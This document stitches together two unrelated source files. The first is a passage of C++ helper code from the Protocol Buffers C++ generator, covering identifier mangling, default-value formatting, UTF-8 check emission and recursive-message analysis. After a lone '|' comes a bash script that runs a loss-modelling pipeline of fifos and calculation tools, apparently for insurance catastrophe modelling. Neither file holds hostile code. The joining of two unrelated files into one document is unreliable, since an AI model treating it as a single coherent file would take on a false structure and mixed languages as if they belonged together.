static const char kGoogleProtobufPrefix[] = "google/protobuf/";
string DotsToUnderscores(const string& name) {
return StringReplace(name, ".", "_", true);
}
string DotsToColons(const string& name) {
return StringReplace(name, ".", "::", true);
}
const char* const kKeywordList[] = {
"alignas", "alignof", "and", "and_eq", "asm", "auto", "bitand", "bitor",
"bool", "break", "case", "catch", "char", "class", "compl", "const",
"constexpr", "const_cast", "continue", "decltype", "default", "delete", "do",
"double", "dynamic_cast", "else", "enum", "explicit", "export", "extern",
"false", "float", "for", "friend", "goto", "if", "inline", "int", "long",
"mutable", "namespace", "new", "noexcept", "not", "not_eq", "nullptr",
"operator", "or", "or_eq", "private", "protected", "public", "register",
"reinterpret_cast", "return", "short", "signed", "sizeof", "static",
"static_assert", "static_cast", "struct", "switch", "template", "this",
"thread_local", "throw", "true", "try", "typedef", "typeid", "typename",
"union", "unsigned", "using", "virtual", "void", "volatile", "wchar_t",
"while", "xor", "xor_eq"
};
hash_set<string> MakeKeywordsMap() {
hash_set<string> result;
for (int i = 0; i < GOOGLE_ARRAYSIZE(kKeywordList); i++) {
result.insert(kKeywordList[i]);
}
return result;
}
hash_set<string> kKeywords = MakeKeywordsMap();
// Returns whether the provided descriptor has an extension. This includes its
// nested types.
bool HasExtension(const Descriptor* descriptor) {
if (descriptor->extension_count() > 0) {
return true;
}
for (int i = 0; i < descriptor->nested_type_count(); ++i) {
if (HasExtension(descriptor->nested_type(i))) {
return true;
}
}
return false;
}
// Encode [0..63] as 'A'-'Z', 'a'-'z', '0'-'9', '_'
char Base63Char(int value) {
GOOGLE_CHECK_GE(value, 0);
if (value < 26) return 'A' + value;
value -= 26;
if (value < 26) return 'a' + value;
value -= 26;
if (value < 10) return '0' + value;
GOOGLE_CHECK_EQ(value, 10);
return '_';
}
// Given a c identifier has 63 legal characters we can't implement base64
// encoding. So we return the k least significant "digits" in base 63.
template <typename I>
string Base63(I n, int k) {
string res;
while (k-- > 0) {
res += Base63Char(static_cast<int>(n % 63));
n /= 63;
}
return res;
}
} // namespace
string UnderscoresToCamelCase(const string& input, bool cap_next_letter) {
string result;
// Note: I distrust ctype.h due to locales.
for (int i = 0; i < input.size(); i++) {
if ('a' <= input[i] && input[i] <= 'z') {
if (cap_next_letter) {
result += input[i] + ('A' - 'a');
} else {
result += input[i];
}
cap_next_letter = false;
} else if ('A' <= input[i] && input[i] <= 'Z') {
// Capital letters are left as-is.
result += input[i];
cap_next_letter = false;
} else if ('0' <= input[i] && input[i] <= '9') {
result += input[i];
cap_next_letter = true;
} else {
cap_next_letter = true;
}
}
return result;
}
const char kThickSeparator[] =
"// ===================================================================\n";
const char kThinSeparator[] =
"// -------------------------------------------------------------------\n";
bool CanInitializeByZeroing(const FieldDescriptor* field) {
if (field->is_repeated() || field->is_extension()) return false;
switch (field->cpp_type()) {
case FieldDescriptor::CPPTYPE_ENUM:
return field->default_value_enum()->number() == 0;
case FieldDescriptor::CPPTYPE_INT32:
return field->default_value_int32() == 0;
case FieldDescriptor::CPPTYPE_INT64:
return field->default_value_int64() == 0;
case FieldDescriptor::CPPTYPE_UINT32:
return field->default_value_uint32() == 0;
case FieldDescriptor::CPPTYPE_UINT64:
return field->default_value_uint64() == 0;
case FieldDescriptor::CPPTYPE_FLOAT:
return field->default_value_float() == 0;
case FieldDescriptor::CPPTYPE_DOUBLE:
return field->default_value_double() == 0;
case FieldDescriptor::CPPTYPE_BOOL:
return field->default_value_bool() == false;
default:
return false;
}
}
string ClassName(const Descriptor* descriptor) {
const Descriptor* parent = descriptor->containing_type();
string res;
if (parent) res += ClassName(parent) + "_";
res += descriptor->name();
if (IsMapEntryMessage(descriptor)) res += "_DoNotUse";
return res;
}
string ClassName(const EnumDescriptor* enum_descriptor) {
if (enum_descriptor->containing_type() == NULL) {
return enum_descriptor->name();
} else {
return ClassName(enum_descriptor->containing_type()) + "_" +
enum_descriptor->name();
}
}
string Namespace(const string& package) {
if (package.empty()) return "";
return "::" + DotsToColons(package);
}
string DefaultInstanceName(const Descriptor* descriptor) {
string prefix = descriptor->file()->package().empty() ? "" : "::";
return prefix + DotsToColons(descriptor->file()->package()) + "::_" +
ClassName(descriptor, false) + "_default_instance_";
}
string ReferenceFunctionName(const Descriptor* descriptor) {
return QualifiedClassName(descriptor) + "_ReferenceStrong";
}
string SuperClassName(const Descriptor* descriptor, const Options& options) {
return HasDescriptorMethods(descriptor->file(), options)
? "::google::protobuf::Message"
: "::google::protobuf::MessageLite";
}
string FieldName(const FieldDescriptor* field) {
string result = field->name();
LowerString(&result);
if (kKeywords.count(result) > 0) {
result.append("_");
}
return result;
}
string EnumValueName(const EnumValueDescriptor* enum_value) {
string result = enum_value->name();
if (kKeywords.count(result) > 0) {
result.append("_");
}
return result;
}
int EstimateAlignmentSize(const FieldDescriptor* field) {
if (field == NULL) return 0;
if (field->is_repeated()) return 8;
switch (field->cpp_type()) {
case FieldDescriptor::CPPTYPE_BOOL:
return 1;
case FieldDescriptor::CPPTYPE_INT32:
case FieldDescriptor::CPPTYPE_UINT32:
case FieldDescriptor::CPPTYPE_ENUM:
case FieldDescriptor::CPPTYPE_FLOAT:
return 4;
case FieldDescriptor::CPPTYPE_INT64:
case FieldDescriptor::CPPTYPE_UINT64:
case FieldDescriptor::CPPTYPE_DOUBLE:
case FieldDescriptor::CPPTYPE_STRING:
case FieldDescriptor::CPPTYPE_MESSAGE:
return 8;
}
GOOGLE_LOG(FATAL) << "Can't get here.";
return -1; // Make compiler happy.
}
string FieldConstantName(const FieldDescriptor *field) {
string field_name = UnderscoresToCamelCase(field->name(), true);
string result = "k" + field_name + "FieldNumber";
if (!field->is_extension() &&
field->containing_type()->FindFieldByCamelcaseName(
field->camelcase_name()) != field) {
// This field's camelcase name is not unique. As a hack, add the field
// number to the constant name. This makes the constant rather useless,
// but what can we do?
result += "_" + SimpleItoa(field->number());
}
return result;
}
string FieldMessageTypeName(const FieldDescriptor* field) {
// Note: The Google-internal version of Protocol Buffers uses this function
// as a hook point for hacks to support legacy code.
return ClassName(field->message_type(), true);
}
string StripProto(const string& filename) {
if (HasSuffixString(filename, ".protodevel")) {
return StripSuffixString(filename, ".protodevel");
} else {
return StripSuffixString(filename, ".proto");
}
}
const char* PrimitiveTypeName(FieldDescriptor::CppType type) {
switch (type) {
case FieldDescriptor::CPPTYPE_INT32 : return "::google::protobuf::int32";
case FieldDescriptor::CPPTYPE_INT64 : return "::google::protobuf::int64";
case FieldDescriptor::CPPTYPE_UINT32 : return "::google::protobuf::uint32";
case FieldDescriptor::CPPTYPE_UINT64 : return "::google::protobuf::uint64";
case FieldDescriptor::CPPTYPE_DOUBLE : return "double";
case FieldDescriptor::CPPTYPE_FLOAT : return "float";
case FieldDescriptor::CPPTYPE_BOOL : return "bool";
case FieldDescriptor::CPPTYPE_ENUM : return "int";
case FieldDescriptor::CPPTYPE_STRING : return "::std::string";
case FieldDescriptor::CPPTYPE_MESSAGE: return NULL;
// No default because we want the compiler to complain if any new
// CppTypes are added.
}
GOOGLE_LOG(FATAL) << "Can't get here.";
return NULL;
}
const char* DeclaredTypeMethodName(FieldDescriptor::Type type) {
switch (type) {
case FieldDescriptor::TYPE_INT32 : return "Int32";
case FieldDescriptor::TYPE_INT64 : return "Int64";
case FieldDescriptor::TYPE_UINT32 : return "UInt32";
case FieldDescriptor::TYPE_UINT64 : return "UInt64";
case FieldDescriptor::TYPE_SINT32 : return "SInt32";
case FieldDescriptor::TYPE_SINT64 : return "SInt64";
case FieldDescriptor::TYPE_FIXED32 : return "Fixed32";
case FieldDescriptor::TYPE_FIXED64 : return "Fixed64";
case FieldDescriptor::TYPE_SFIXED32: return "SFixed32";
case FieldDescriptor::TYPE_SFIXED64: return "SFixed64";
case FieldDescriptor::TYPE_FLOAT : return "Float";
case FieldDescriptor::TYPE_DOUBLE : return "Double";
case FieldDescriptor::TYPE_BOOL : return "Bool";
case FieldDescriptor::TYPE_ENUM : return "Enum";
case FieldDescriptor::TYPE_STRING : return "String";
case FieldDescriptor::TYPE_BYTES : return "Bytes";
case FieldDescriptor::TYPE_GROUP : return "Group";
case FieldDescriptor::TYPE_MESSAGE : return "Message";
// No default because we want the compiler to complain if any new
// types are added.
}
GOOGLE_LOG(FATAL) << "Can't get here.";
return "";
}
string Int32ToString(int number) {
// gcc rejects the decimal form of kint32min.
if (number == kint32min) {
GOOGLE_COMPILE_ASSERT(kint32min == (~0x7fffffff), kint32min_value_error);
return "(~0x7fffffff)";
} else {
return SimpleItoa(number);
}
}
string Int64ToString(int64 number) {
// gcc rejects the decimal form of kint64min
if (number == kint64min) {
// Make sure we are in a 2's complement system.
GOOGLE_COMPILE_ASSERT(kint64min == GOOGLE_LONGLONG(~0x7fffffffffffffff),
kint64min_value_error);
return "GOOGLE_LONGLONG(~0x7fffffffffffffff)";
}
return "GOOGLE_LONGLONG(" + SimpleItoa(number) + ")";
}
string DefaultValue(const FieldDescriptor* field) {
switch (field->cpp_type()) {
case FieldDescriptor::CPPTYPE_INT32:
return Int32ToString(field->default_value_int32());
case FieldDescriptor::CPPTYPE_UINT32:
return SimpleItoa(field->default_value_uint32()) + "u";
case FieldDescriptor::CPPTYPE_INT64:
return Int64ToString(field->default_value_int64());
case FieldDescriptor::CPPTYPE_UINT64:
return "GOOGLE_ULONGLONG(" + SimpleItoa(field->default_value_uint64())+ ")";
case FieldDescriptor::CPPTYPE_DOUBLE: {
double value = field->default_value_double();
if (value == std::numeric_limits<double>::infinity()) {
return "::google::protobuf::internal::Infinity()";
} else if (value == -std::numeric_limits<double>::infinity()) {
return "-::google::protobuf::internal::Infinity()";
} else if (value != value) {
return "::google::protobuf::internal::NaN()";
} else {
return SimpleDtoa(value);
}
}
case FieldDescriptor::CPPTYPE_FLOAT:
{
float value = field->default_value_float();
if (value == std::numeric_limits<float>::infinity()) {
return "static_cast<float>(::google::protobuf::internal::Infinity())";
} else if (value == -std::numeric_limits<float>::infinity()) {
return "static_cast<float>(-::google::protobuf::internal::Infinity())";
} else if (value != value) {
return "static_cast<float>(::google::protobuf::internal::NaN())";
} else {
string float_value = SimpleFtoa(value);
// If floating point value contains a period (.) or an exponent
// (either E or e), then append suffix 'f' to make it a float
// literal.
if (float_value.find_first_of(".eE") != string::npos) {
float_value.push_back('f');
}
return float_value;
}
}
case FieldDescriptor::CPPTYPE_BOOL:
return field->default_value_bool() ? "true" : "false";
case FieldDescriptor::CPPTYPE_ENUM:
// Lazy: Generate a static_cast because we don't have a helper function
// that constructs the full name of an enum value.
return strings::Substitute(
"static_cast< $0 >($1)",
ClassName(field->enum_type(), true),
Int32ToString(field->default_value_enum()->number()));
case FieldDescriptor::CPPTYPE_STRING:
return "\"" + EscapeTrigraphs(
CEscape(field->default_value_string())) +
"\"";
case FieldDescriptor::CPPTYPE_MESSAGE:
return "*" + FieldMessageTypeName(field) +
"::internal_default_instance()";
}
// Can't actually get here; make compiler happy. (We could add a default
// case above but then we wouldn't get the nice compiler warning when a
// new type is added.)
GOOGLE_LOG(FATAL) << "Can't get here.";
return "";
}
// Convert a file name into a valid identifier.
string FilenameIdentifier(const string& filename) {
string result;
for (int i = 0; i < filename.size(); i++) {
if (ascii_isalnum(filename[i])) {
result.push_back(filename[i]);
} else {
// Not alphanumeric. To avoid any possibility of name conflicts we
// use the hex code for the character.
StrAppend(&result, "_", strings::Hex(static_cast<uint8>(filename[i])));
}
}
return result;
}
string FileLevelNamespace(const string& filename) {
return "protobuf_" + FilenameIdentifier(filename);
}
// Return the qualified C++ name for a file level symbol.
string QualifiedFileLevelSymbol(const string& package, const string& name) {
if (package.empty()) {
return StrCat("::", name);
}
return StrCat("::", DotsToColons(package), "::", name);
}
// Escape C++ trigraphs by escaping question marks to \?
string EscapeTrigraphs(const string& to_escape) {
return StringReplace(to_escape, "?", "\\?", true);
}
// Escaped function name to eliminate naming conflict.
string SafeFunctionName(const Descriptor* descriptor,
const FieldDescriptor* field,
const string& prefix) {
// Do not use FieldName() since it will escape keywords.
string name = field->name();
LowerString(&name);
string function_name = prefix + name;
if (descriptor->FindFieldByName(function_name)) {
// Single underscore will also make it conflicting with the private data
// member. We use double underscore to escape function names.
function_name.append("__");
} else if (kKeywords.count(name) > 0) {
// If the field name is a keyword, we append the underscore back to keep it
// consistent with other function names.
function_name.append("_");
}
return function_name;
}
static bool HasMapFields(const Descriptor* descriptor) {
for (int i = 0; i < descriptor->field_count(); ++i) {
if (descriptor->field(i)->is_map()) {
return true;
}
}
for (int i = 0; i < descriptor->nested_type_count(); ++i) {
if (HasMapFields(descriptor->nested_type(i))) return true;
}
return false;
}
bool HasMapFields(const FileDescriptor* file) {
for (int i = 0; i < file->message_type_count(); ++i) {
if (HasMapFields(file->message_type(i))) return true;
}
return false;
}
static bool HasEnumDefinitions(const Descriptor* message_type) {
if (message_type->enum_type_count() > 0) return true;
for (int i = 0; i < message_type->nested_type_count(); ++i) {
if (HasEnumDefinitions(message_type->nested_type(i))) return true;
}
return false;
}
bool HasEnumDefinitions(const FileDescriptor* file) {
if (file->enum_type_count() > 0) return true;
for (int i = 0; i < file->message_type_count(); ++i) {
if (HasEnumDefinitions(file->message_type(i))) return true;
}
return false;
}
bool IsStringOrMessage(const FieldDescriptor* field) {
switch (field->cpp_type()) {
case FieldDescriptor::CPPTYPE_INT32:
case FieldDescriptor::CPPTYPE_INT64:
case FieldDescriptor::CPPTYPE_UINT32:
case FieldDescriptor::CPPTYPE_UINT64:
case FieldDescriptor::CPPTYPE_DOUBLE:
case FieldDescriptor::CPPTYPE_FLOAT:
case FieldDescriptor::CPPTYPE_BOOL:
case FieldDescriptor::CPPTYPE_ENUM:
return false;
case FieldDescriptor::CPPTYPE_STRING:
case FieldDescriptor::CPPTYPE_MESSAGE:
return true;
}
GOOGLE_LOG(FATAL) << "Can't get here.";
return false;
}
FieldOptions::CType EffectiveStringCType(const FieldDescriptor* field) {
GOOGLE_DCHECK(field->cpp_type() == FieldDescriptor::CPPTYPE_STRING);
// Open-source protobuf release only supports STRING ctype.
return FieldOptions::STRING;
}
bool IsAnyMessage(const FileDescriptor* descriptor) {
return descriptor->name() == kAnyProtoFile;
}
bool IsAnyMessage(const Descriptor* descriptor) {
return descriptor->name() == kAnyMessageName &&
descriptor->file()->name() == kAnyProtoFile;
}
bool IsWellKnownMessage(const FileDescriptor* descriptor) {
return !descriptor->name().compare(0, 16, kGoogleProtobufPrefix);
}
enum Utf8CheckMode {
STRICT = 0, // Parsing will fail if non UTF-8 data is in string fields.
VERIFY = 1, // Only log an error but parsing will succeed.
NONE = 2, // No UTF-8 check.
};
// Which level of UTF-8 enforcemant is placed on this file.
static Utf8CheckMode GetUtf8CheckMode(const FieldDescriptor* field,
const Options& options) {
if (field->file()->syntax() == FileDescriptor::SYNTAX_PROTO3) {
return STRICT;
} else if (GetOptimizeFor(field->file(), options) !=
FileOptions::LITE_RUNTIME) {
return VERIFY;
} else {
return NONE;
}
}
static void GenerateUtf8CheckCode(const FieldDescriptor* field,
const Options& options, bool for_parse,
const std::map<string, string>& variables,
const char* parameters,
const char* strict_function,
const char* verify_function,
io::Printer* printer) {
switch (GetUtf8CheckMode(field, options)) {
case STRICT: {
if (for_parse) {
printer->Print("DO_(");
}
printer->Print(
"::google::protobuf::internal::WireFormatLite::$function$(\n",
"function", strict_function);
printer->Indent();
printer->Print(variables, parameters);
if (for_parse) {
printer->Print("::google::protobuf::internal::WireFormatLite::PARSE,\n");
} else {
printer->Print("::google::protobuf::internal::WireFormatLite::SERIALIZE,\n");
}
printer->Print("\"$full_name$\")", "full_name", field->full_name());
if (for_parse) {
printer->Print(")");
}
printer->Print(";\n");
printer->Outdent();
break;
}
case VERIFY: {
printer->Print(
"::google::protobuf::internal::WireFormat::$function$(\n",
"function", verify_function);
printer->Indent();
printer->Print(variables, parameters);
if (for_parse) {
printer->Print("::google::protobuf::internal::WireFormat::PARSE,\n");
} else {
printer->Print("::google::protobuf::internal::WireFormat::SERIALIZE,\n");
}
printer->Print("\"$full_name$\");\n", "full_name", field->full_name());
printer->Outdent();
break;
}
case NONE:
break;
}
}
void GenerateUtf8CheckCodeForString(const FieldDescriptor* field,
const Options& options, bool for_parse,
const std::map<string, string>& variables,
const char* parameters,
io::Printer* printer) {
GenerateUtf8CheckCode(field, options, for_parse, variables, parameters,
"VerifyUtf8String", "VerifyUTF8StringNamedField",
printer);
}
void GenerateUtf8CheckCodeForCord(const FieldDescriptor* field,
const Options& options, bool for_parse,
const std::map<string, string>& variables,
const char* parameters,
io::Printer* printer) {
GenerateUtf8CheckCode(field, options, for_parse, variables, parameters,
"VerifyUtf8Cord", "VerifyUTF8CordNamedField", printer);
}
namespace {
void Flatten(const Descriptor* descriptor,
std::vector<const Descriptor*>* flatten) {
for (int i = 0; i < descriptor->nested_type_count(); i++)
Flatten(descriptor->nested_type(i), flatten);
flatten->push_back(descriptor);
}
} // namespace
void FlattenMessagesInFile(const FileDescriptor* file,
std::vector<const Descriptor*>* result) {
for (int i = 0; i < file->message_type_count(); i++) {
Flatten(file->message_type(i), result);
}
}
bool HasWeakFields(const Descriptor* descriptor) {
return false;
}
bool HasWeakFields(const FileDescriptor* file) {
return false;
}
bool UsingImplicitWeakFields(const FileDescriptor* file,
const Options& options) {
return options.lite_implicit_weak_fields &&
GetOptimizeFor(file, options) == FileOptions::LITE_RUNTIME;
}
bool IsImplicitWeakField(const FieldDescriptor* field, const Options& options,
SCCAnalyzer* scc_analyzer) {
return UsingImplicitWeakFields(field->file(), options) &&
field->type() == FieldDescriptor::TYPE_MESSAGE &&
!field->is_required() && !field->is_map() &&
field->containing_oneof() == NULL &&
!IsWellKnownMessage(field->message_type()->file()) &&
// We do not support implicit weak fields between messages in the same
// strongly-connected component.
scc_analyzer->GetSCC(field->containing_type()) !=
scc_analyzer->GetSCC(field->message_type());
}
struct CompareDescriptors {
bool operator()(const Descriptor* a, const Descriptor* b) {
return a->full_name() < b->full_name();
}
};
SCCAnalyzer::NodeData SCCAnalyzer::DFS(const Descriptor* descriptor) {
// Must not have visited already.
GOOGLE_DCHECK_EQ(cache_.count(descriptor), 0);
// Mark visited by inserting in map.
NodeData& result = cache_[descriptor];
// Initialize data structures.
result.index = result.lowlink = index_++;
stack_.push_back(descriptor);
// Recurse the fields / nodes in graph
for (int i = 0; i < descriptor->field_count(); i++) {
const Descriptor* child = descriptor->field(i)->message_type();
if (child) {
if (cache_.count(child) == 0) {
// unexplored node
NodeData child_data = DFS(child);
result.lowlink = std::min(result.lowlink, child_data.lowlink);
} else {
NodeData child_data = cache_[child];
if (child_data.scc == NULL) {
// Still in the stack_ so we found a back edge
result.lowlink = std::min(result.lowlink, child_data.index);
}
}
}
}
if (result.index == result.lowlink) {
// This is the root of a strongly connected component
SCC* scc = CreateSCC();
while (true) {
const Descriptor* scc_desc = stack_.back();
scc->descriptors.push_back(scc_desc);
// Remove from stack
stack_.pop_back();
cache_[scc_desc].scc = scc;
if (scc_desc == descriptor) break;
}
// The order of descriptors is random and depends how this SCC was
// discovered. In-order to ensure maximum stability we sort it by name.
std::sort(scc->descriptors.begin(), scc->descriptors.end(),
CompareDescriptors());
AddChildren(scc);
}
return result;
}
void SCCAnalyzer::AddChildren(SCC* scc) {
std::set<const SCC*> seen;
for (int i = 0; i < scc->descriptors.size(); i++) {
const Descriptor* descriptor = scc->descriptors[i];
for (int j = 0; j < descriptor->field_count(); j++) {
const Descriptor* child_msg = descriptor->field(j)->message_type();
if (child_msg) {
const SCC* child = GetSCC(child_msg);
if (child == scc) continue;
if (seen.insert(child).second) {
scc->children.push_back(child);
}
}
}
}
}
MessageAnalysis SCCAnalyzer::GetSCCAnalysis(const SCC* scc) {
if (analysis_cache_.count(scc)) return analysis_cache_[scc];
MessageAnalysis result = MessageAnalysis();
for (int i = 0; i < scc->descriptors.size(); i++) {
const Descriptor* descriptor = scc->descriptors[i];
if (descriptor->extension_range_count() > 0) {
result.contains_extension = true;
}
for (int i = 0; i < descriptor->field_count(); i++) {
const FieldDescriptor* field = descriptor->field(i);
if (field->is_required()) {
result.contains_required = true;
}
switch (field->type()) {
case FieldDescriptor::TYPE_STRING:
case FieldDescriptor::TYPE_BYTES: {
if (field->options().ctype() == FieldOptions::CORD) {
result.contains_cord = true;
}
break;
}
case FieldDescriptor::TYPE_GROUP:
case FieldDescriptor::TYPE_MESSAGE: {
const SCC* child = GetSCC(field->message_type());
if (child != scc) {
MessageAnalysis analysis = GetSCCAnalysis(child);
result.contains_cord |= analysis.contains_cord;
result.contains_extension |= analysis.contains_extension;
if (!ShouldIgnoreRequiredFieldCheck(field, options_)) {
result.contains_required |= analysis.contains_required;
}
} else {
// This field points back into the same SCC hence the messages
// in the SCC are recursive. Note if SCC contains more than two
// nodes it has to be recursive, however this test also works for
// a single node that is recursive.
result.is_recursive = true;
}
break;
}
default:
break;
}
}
}
// We deliberately only insert the result here. After we contracted the SCC
// in the graph, the graph should be a DAG. Hence we shouldn't need to mark
// nodes visited as we can never return to them. By inserting them here
// we will go in an infinite loop if the SCC is not correct.
return analysis_cache_[scc] = result;
}
void ListAllFields(const Descriptor* d,
std::vector<const FieldDescriptor*>* fields) {
// Collect sub messages
for (int i = 0; i < d->nested_type_count(); i++) {
ListAllFields(d->nested_type(i), fields);
}
// Collect message level extensions.
for (int i = 0; i < d->extension_count(); i++) {
fields->push_back(d->extension(i));
}
// Add types of fields necessary
for (int i = 0; i < d->field_count(); i++) {
fields->push_back(d->field(i));
}
}
void ListAllFields(const FileDescriptor* d,
std::vector<const FieldDescriptor*>* fields) {
// Collect file level message.
for (int i = 0; i < d->message_type_count(); i++) {
ListAllFields(d->message_type(i), fields);
}
// Collect message level extensions.
for (int i = 0; i < d->extension_count(); i++) {
fields->push_back(d->extension(i));
}
}
void ListAllTypesForServices(const FileDescriptor* fd,
std::vector<const Descriptor*>* types) {
for (int i = 0; i < fd->service_count(); i++) {
const ServiceDescriptor* sd = fd->service(i);
for (int j = 0; j < sd->method_count(); j++) {
const MethodDescriptor* method = sd->method(j);
types->push_back(method->input_type());
types->push_back(method->output_type());
}
}
}
} // namespace cpp
} // namespace compiler
} // namespace protobuf
} // namespace google
|
#!/usr/bin/env -S bash -euET -o pipefail -O inherit_errexit
SCRIPT=$(readlink -f "$0") && cd $(dirname "$SCRIPT")
# --- Script Init ---
mkdir -p log
rm -R -f log/*
# --- Setup run dirs ---
find output -type f -not -name '*summary-info*' -not -name '*.json' -exec rm -R -f {} +
mkdir output/full_correlation/
rm -R -f fifo/*
mkdir fifo/full_correlation/
rm -R -f work/*
mkdir work/kat/
mkdir work/full_correlation/
mkdir work/full_correlation/kat/
mkdir work/gul_S1_summaryleccalc
mkdir work/gul_S1_summaryaalcalc
mkdir work/full_correlation/gul_S1_summaryleccalc
mkdir work/full_correlation/gul_S1_summaryaalcalc
mkdir work/il_S1_summaryleccalc
mkdir work/il_S1_summaryaalcalc
mkdir work/full_correlation/il_S1_summaryleccalc
mkdir work/full_correlation/il_S1_summaryaalcalc
mkfifo fifo/full_correlation/gul_fc_P26
mkfifo fifo/gul_P26
mkfifo fifo/gul_S1_summary_P26
mkfifo fifo/gul_S1_summary_P26.idx
mkfifo fifo/gul_S1_eltcalc_P26
mkfifo fifo/gul_S1_summarycalc_P26
mkfifo fifo/gul_S1_pltcalc_P26
mkfifo fifo/il_P26
mkfifo fifo/il_S1_summary_P26
mkfifo fifo/il_S1_summary_P26.idx
mkfifo fifo/il_S1_eltcalc_P26
mkfifo fifo/il_S1_summarycalc_P26
mkfifo fifo/il_S1_pltcalc_P26
mkfifo fifo/full_correlation/gul_P26
mkfifo fifo/full_correlation/gul_S1_summary_P26
mkfifo fifo/full_correlation/gul_S1_summary_P26.idx
mkfifo fifo/full_correlation/gul_S1_eltcalc_P26
mkfifo fifo/full_correlation/gul_S1_summarycalc_P26
mkfifo fifo/full_correlation/gul_S1_pltcalc_P26
mkfifo fifo/full_correlation/il_P26
mkfifo fifo/full_correlation/il_S1_summary_P26
mkfifo fifo/full_correlation/il_S1_summary_P26.idx
mkfifo fifo/full_correlation/il_S1_eltcalc_P26
mkfifo fifo/full_correlation/il_S1_summarycalc_P26
mkfifo fifo/full_correlation/il_S1_pltcalc_P26
# --- Do insured loss computes ---
eltcalc -s < fifo/il_S1_eltcalc_P26 > work/kat/il_S1_eltcalc_P26 & pid1=$!
summarycalctocsv -s < fifo/il_S1_summarycalc_P26 > work/kat/il_S1_summarycalc_P26 & pid2=$!
pltcalc -s < fifo/il_S1_pltcalc_P26 > work/kat/il_S1_pltcalc_P26 & pid3=$!
tee < fifo/il_S1_summary_P26 fifo/il_S1_eltcalc_P26 fifo/il_S1_summarycalc_P26 fifo/il_S1_pltcalc_P26 work/il_S1_summaryaalcalc/P26.bin work/il_S1_summaryleccalc/P26.bin > /dev/null & pid4=$!
tee < fifo/il_S1_summary_P26.idx work/il_S1_summaryleccalc/P26.idx > /dev/null & pid5=$!
summarycalc -m -f -1 fifo/il_S1_summary_P26 < fifo/il_P26 &
# --- Do ground up loss computes ---
eltcalc -s < fifo/gul_S1_eltcalc_P26 > work/kat/gul_S1_eltcalc_P26 & pid6=$!
summarycalctocsv -s < fifo/gul_S1_summarycalc_P26 > work/kat/gul_S1_summarycalc_P26 & pid7=$!
pltcalc -s < fifo/gul_S1_pltcalc_P26 > work/kat/gul_S1_pltcalc_P26 & pid8=$!
tee < fifo/gul_S1_summary_P26 fifo/gul_S1_eltcalc_P26 fifo/gul_S1_summarycalc_P26 fifo/gul_S1_pltcalc_P26 work/gul_S1_summaryaalcalc/P26.bin work/gul_S1_summaryleccalc/P26.bin > /dev/null & pid9=$!
tee < fifo/gul_S1_summary_P26.idx work/gul_S1_summaryleccalc/P26.idx > /dev/null & pid10=$!
summarycalc -m -i -1 fifo/gul_S1_summary_P26 < fifo/gul_P26 &
# --- Do insured loss computes ---
eltcalc -s < fifo/full_correlation/il_S1_eltcalc_P26 > work/full_correlation/kat/il_S1_eltcalc_P26 & pid11=$!
summarycalctocsv -s < fifo/full_correlation/il_S1_summarycalc_P26 > work/full_correlation/kat/il_S1_summarycalc_P26 & pid12=$!
pltcalc -s < fifo/full_correlation/il_S1_pltcalc_P26 > work/full_correlation/kat/il_S1_pltcalc_P26 & pid13=$!
tee < fifo/full_correlation/il_S1_summary_P26 fifo/full_correlation/il_S1_eltcalc_P26 fifo/full_correlation/il_S1_summarycalc_P26 fifo/full_correlation/il_S1_pltcalc_P26 work/full_correlation/il_S1_summaryaalcalc/P26.bin work/full_correlation/il_S1_summaryleccalc/P26.bin > /dev/null & pid14=$!
tee < fifo/full_correlation/il_S1_summary_P26.idx work/full_correlation/il_S1_summaryleccalc/P26.idx > /dev/null & pid15=$!
summarycalc -m -f -1 fifo/full_correlation/il_S1_summary_P26 < fifo/full_correlation/il_P26 &
# --- Do ground up loss computes ---
eltcalc -s < fifo/full_correlation/gul_S1_eltcalc_P26 > work/full_correlation/kat/gul_S1_eltcalc_P26 & pid16=$!
summarycalctocsv -s < fifo/full_correlation/gul_S1_summarycalc_P26 > work/full_correlation/kat/gul_S1_summarycalc_P26 & pid17=$!
pltcalc -s < fifo/full_correlation/gul_S1_pltcalc_P26 > work/full_correlation/kat/gul_S1_pltcalc_P26 & pid18=$!
tee < fifo/full_correlation/gul_S1_summary_P26 fifo/full_correlation/gul_S1_eltcalc_P26 fifo/full_correlation/gul_S1_summarycalc_P26 fifo/full_correlation/gul_S1_pltcalc_P26 work/full_correlation/gul_S1_summaryaalcalc/P26.bin work/full_correlation/gul_S1_summaryleccalc/P26.bin > /dev/null & pid19=$!
tee < fifo/full_correlation/gul_S1_summary_P26.idx work/full_correlation/gul_S1_summaryleccalc/P26.idx > /dev/null & pid20=$!
summarycalc -m -i -1 fifo/full_correlation/gul_S1_summary_P26 < fifo/full_correlation/gul_P26 &
tee < fifo/full_correlation/gul_fc_P26 fifo/full_correlation/gul_P26 | fmcalc -a2 > fifo/full_correlation/il_P26 &
eve 26 40 | getmodel | gulcalc -S100 -L100 -r -j fifo/full_correlation/gul_fc_P26 -a1 -i - | tee fifo/gul_P26 | fmcalc -a2 > fifo/il_P26 &
wait $pid1 $pid2 $pid3 $pid4 $pid5 $pid6 $pid7 $pid8 $pid9 $pid10 $pid11 $pid12 $pid13 $pid14 $pid15 $pid16 $pid17 $pid18 $pid19 $pid20
# --- Do insured loss kats ---
kat -s work/kat/il_S1_eltcalc_P26 > output/il_S1_eltcalc.csv & kpid1=$!
kat work/kat/il_S1_pltcalc_P26 > output/il_S1_pltcalc.csv & kpid2=$!
kat work/kat/il_S1_summarycalc_P26 > output/il_S1_summarycalc.csv & kpid3=$!
# --- Do insured loss kats for fully correlated output ---
kat -s work/full_correlation/kat/il_S1_eltcalc_P26 > output/full_correlation/il_S1_eltcalc.csv & kpid4=$!
kat work/full_correlation/kat/il_S1_pltcalc_P26 > output/full_correlation/il_S1_pltcalc.csv & kpid5=$!
kat work/full_correlation/kat/il_S1_summarycalc_P26 > output/full_correlation/il_S1_summarycalc.csv & kpid6=$!
# --- Do ground up loss kats ---
kat -s work/kat/gul_S1_eltcalc_P26 > output/gul_S1_eltcalc.csv & kpid7=$!
kat work/kat/gul_S1_pltcalc_P26 > output/gul_S1_pltcalc.csv & kpid8=$!
kat work/kat/gul_S1_summarycalc_P26 > output/gul_S1_summarycalc.csv & kpid9=$!
# --- Do ground up loss kats for fully correlated output ---
kat -s work/full_correlation/kat/gul_S1_eltcalc_P26 > output/full_correlation/gul_S1_eltcalc.csv & kpid10=$!
kat work/full_correlation/kat/gul_S1_pltcalc_P26 > output/full_correlation/gul_S1_pltcalc.csv & kpid11=$!
kat work/full_correlation/kat/gul_S1_summarycalc_P26 > output/full_correlation/gul_S1_summarycalc.csv & kpid12=$!
